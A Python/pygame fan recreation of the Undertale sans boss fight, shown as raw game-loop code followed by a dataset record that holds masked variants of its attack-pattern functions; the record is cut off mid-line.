for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 20
x = 40
if page == FIGHT:
player.options = [(40, 255)]
screen.blit(
battle_font.render("* sans", True, (255, 255, 255)),
(40, 250)
)
if player.choose:
page = [FIGHT_SANS][player.choice]
player.choose = False
player.choice = 0
choice_pos = [50, 250]
if player.back:
page = MAIN_PAGE
if page == FIGHT_SANS:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
target_img.set_alpha(target_alpha)
if not choice_blink:
if target_alpha >= 255:
choice_going = True
else:
target_alpha += 10
screen.blit(target_img, [BOX_POS[0] + 10, BOX_POS[1] + 5])
screen.blit([choice_img, choice_blink_img][choice_ani_index // 5 % 2], choice_pos)
choice_ani_index += choice_blink
choice_pos[0] += choice_going * 8
if choice_going and (player.choose or choice_pos[0] > BOX_POS[0] + BOX_SIZE[0]):
choice_going = False
choice_blink = True
tasks.append(Strike(sans.pos[:]))
if not before_strike:
sans.target_pos = [100, 80]
else:
before_strike()
if choice_blink:
blink_time += 1
if blink_time > 60:
show_sans_damage = False
choice_going = False
choice_blink = False
choice_ani_index = 0
target_alpha = 0
blink_time = 0
is_players_turn = False
stop = False
page = MAIN_PAGE
if not after_strike:
sans.target_pos = [250, 80]
else:
after_strike()
player.pos = [
BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2
]
elif blink_time > 30:
target_alpha -= 10
show_sans_damage = True
if page == MERCY:
player.options = [(40, 255)]
screen.blit(
battle_font.render("* sans", True, (255, 255, 255)),
(40, 250)
)
if player.choose:
page = [MERCY_SANS][player.choice]
player.choose = False
player.choice = 0
if player.back:
page = MAIN_PAGE
if page == MERCY_SANS:
player.options = []
y = 250
for _ in mc_actions.keys():
screen.blit(
battle_font.render(_, True, (255, 255, 255)),
(40, y)
)
player.options.append((40, y + 5))
y += 20
if player.choose:
page = list(mc_actions.values())[player.choice]
player.choose = False
player.choice = 0
if player.back:
page = MERCY
if page == MERCY_SANS_SPARE: # 你都饶恕了,想必也不想继续玩了()
exit()
if page == MERCY_SANS_FLEE: # 你都逃跑了,想必也不想继续玩了()
exit()
# 你死了
if player.HP + player.KR <= 0:
DEAD = True
if DEAD or restarting:
break
# 判定伤害
blue_mask = pygame.mask.from_surface(mask_surface_blue)
orange_mask = pygame.mask.from_surface(mask_surface_orange)
normal_mask = pygame.mask.from_surface(mask_surface_normal)
if mask_collide(blue_mask, player.mask, [0, 0], player.mask_pos):
if any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):
damage(player)
if mask_collide(orange_mask, player.mask, [0, 0], player.mask_pos):
if not any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):
damage(player)
if mask_collide(normal_mask, player.mask, [0, 0], player.mask_pos):
damage(player)
# 玩家
player.show(screen, _boxpos, _boxsize)
# 黑屏攻击
if blackout:
screen.fill(0x000000)
"""将screen的图像加工后放入display"""
if not FULL_SCREEN:
rotated_screen = pygame.transform.rotate(screen, screen_angle)
else:
screen_rect = screen.get_rect()
rotated_screen = pygame.transform.rotate(
pygame.transform.scale(
screen,
(
round(screen_rect.size[1] / screen_rect.size[0] * 1920),
1080
)
),
screen_angle
)
rotated_rect = rotated_screen.get_rect()
if not FULL_SCREEN:
rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]
else:
rotated_rect.center = [960, 540]
display.blit(rotated_screen,
(rotated_rect.x + screen_offset[0],
rotated_rect.y + screen_offset[1]))
fps.tick(frames)
pygame.display.update()
time2 = time_.time()
delta = time2 - time1
if not restarting:
ticks = 0
heart_offset = [0, 0]
while True:
'''死后的'''
pygame.mixer.music.stop()
ticks += 1
screen.fill((0, 0, 0, 255))
if ticks >= 200:
break
if ticks >= 160:
screen.blit(alive_img, player.rect)
if ticks == 160:
split_sound.play()
elif ticks >= 100:
screen.blit(dead_img,
(player.rect.x + heart_offset[0],
player.rect.y + heart_offset[1]))
heart_offset = [random.randint(-2, 2), random.randint(-2, 2)]
elif ticks >= 60:
screen.blit(dead_img, player.rect)
if ticks == 60:
split_sound.play()
else:
screen.blit(alive_img, player.rect)
if not FULL_SCREEN:
rotated_screen = pygame.transform.rotate(screen, screen_angle)
else:
screen_rect = screen.get_rect()
rotated_screen = pygame.transform.rotate(
pygame.transform.scale(
screen,
(
round(screen_rect.size[1] / screen_rect.size[0] * 1920),
1080
)
),
screen_angle
)
rotated_rect = rotated_screen.get_rect()
if not FULL_SCREEN:
rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]
else:
rotated_rect.center = [960, 540]
display.blit(rotated_screen,
(rotated_rect.x + screen_offset[0],
rotated_rect.y + screen_offset[1]))
fps.tick(frames)
pygame.display.update()
|
normal
|
{
"blob_id": "46fd4b976526a1bc70cf902bdb191feea8b84ad9",
"index": 2633,
"step-1": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n<mask token>\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7], speed=[0, \n -5], direction=UP, time1=8, time2=40, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 0], direction=UP, time1=200, time2=48, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 5], direction=UP, time1=8, time2=248, length=1000, type_=1))\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1] + BOX_SIZE[1]], angle\n =0, time1=10, time2=70, time3=10, width=70))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1]], angle=0, time1=10,\n time2=70, time3=10, width=30))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30], length=\n 1000, direction=UP, time1=1000, time2=100, speed=[0, 0], type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] - 8], length=5, direction=DOWN,\n time1=1000, time2=100, speed=[0, 0], type_=2))\n boards.append(Board(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40, speed=[1, 0], time1=BOX_SIZE[0], time2=100, direction=UP))\n for _ in range(0, 20, 4):\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] +\n BOX_SIZE[1] - 40 - 25], length=1000, direction=UP, time1=\n BOX_SIZE[0] // 4, time2=150 + _ * 30, speed=[-4, 0]))\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen: set_screen_angle(0), 682))\n\n\n<mask token>\n\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n sans.say('好了,我也累了,不如我们休息一下?')\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\n@add_attack\ndef before_flash():\n sans.say('好吧,看来你已经做出了自己的选择。')\n\n\n<mask token>\n\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + 50], angle=0, time1\n =10, time2=70, time3=0, width=100))\n\n\ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],\n angle=0, time1=10, time2=70, time3=0, width=100))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7], speed=[0, \n -5], direction=UP, time1=8, time2=40, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 0], direction=UP, time1=200, 